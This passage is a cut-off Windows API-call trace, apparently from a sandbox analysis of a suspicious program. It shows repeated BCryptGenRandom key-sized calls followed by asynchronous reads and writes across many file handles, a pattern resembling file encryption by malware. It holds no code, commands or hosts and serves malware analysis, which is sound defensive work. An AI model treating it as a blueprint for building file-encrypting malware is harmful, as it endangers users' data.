lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.766] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.772] CloseHandle (hObject=0x2f4) returned 1 [0122.772] free (_Block=0x3df0008) [0122.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.823] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0122.891] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.892] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0122.892] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0122.892] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0122.892] free (_Block=0x3e305b8) [0122.892] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0122.892] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0122.893] free (_Block=0x1fa91d0) [0122.893] free (_Block=0x77d7a8) [0122.893] free (_Block=0x1fa90b8) [0122.893] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0122.894] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0122.894] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0123.721] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x23c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0123.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0124.035] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd42, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0124.035] CloseHandle (hObject=0x2f4) returned 1 [0124.036] free (_Block=0x3df0008) [0124.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0124.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0124.044] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0124.044] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.044] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.044] free (_Block=0x3e305b8) [0124.044] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.044] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.045] free (_Block=0x1fa91d0) [0124.045] free (_Block=0x77d7a8) [0124.045] free (_Block=0x1fa90b8) [0124.045] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0124.045] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0124.105] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0124.105] CloseHandle (hObject=0x2f4) returned 1 [0124.105] free (_Block=0x3df0008) [0124.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0124.141] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.141] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0124.142] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.142] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0124.142] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.142] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.142] free (_Block=0x3e305b8) [0124.142] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.142] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.143] free (_Block=0x1fa91d0) [0124.143] free (_Block=0x77d7a8) [0124.143] free (_Block=0x1fa90b8) [0124.143] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0124.143] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0124.158] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0124.158] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0124.168] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1016, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0124.178] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0124.188] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0124.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0124.253] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xf3a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0124.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0124.255] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x4630, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0124.255] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.355] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x6980, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.366] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x2bd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.366] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.372] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x4290, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.372] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.381] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x43c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0138.382] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.384] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xaf94, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.395] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.398] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1714, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.409] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.418] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x5c2c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.434] CloseHandle (hObject=0x3cc) returned 1 [0138.434] free (_Block=0x3d70450) [0138.434] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.441] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.458] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xd80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.533] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2bdc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.564] CloseHandle (hObject=0x3cc) returned 1 [0138.565] free (_Block=0x1ff1e60) [0138.565] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.577] CloseHandle (hObject=0xec) returned 1 [0138.578] free (_Block=0x3d70450) [0138.578] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.588] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0138.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.593] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.593] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.604] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x4540, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.604] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.617] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x2d14, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.621] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.628] CloseHandle (hObject=0xec) returned 1 [0138.628] free (_Block=0x3d70450) [0138.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.628] CloseHandle (hObject=0x308) returned 1 [0138.628] free (_Block=0x3e70008) [0138.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.634] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4b28, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.635] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.635] CloseHandle (hObject=0x3cc) returned 1 [0138.635] free (_Block=0x1ff1e60) [0138.635] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.637] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x19a8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.638] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.638] CloseHandle (hObject=0x338) returned 1 [0138.638] free (_Block=0x3df0008) [0138.638] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.649] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.650] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0138.650] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.650] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0138.651] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.651] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.651] free (_Block=0x3e305b8) [0138.651] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.651] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.651] free (_Block=0x1fa91d0) [0138.651] free (_Block=0x77d7a8) [0138.651] free (_Block=0x1fa90b8) [0138.651] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.651] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0138.660] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.660] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0138.660] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.661] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0138.661] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.661] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.661] free (_Block=0x3e305b8) [0138.661] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.661] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.661] free (_Block=0x1fa91d0) [0138.662] free (_Block=0x77d7a8) [0138.662] free (_Block=0x1fa90b8) [0138.662] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.662] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, 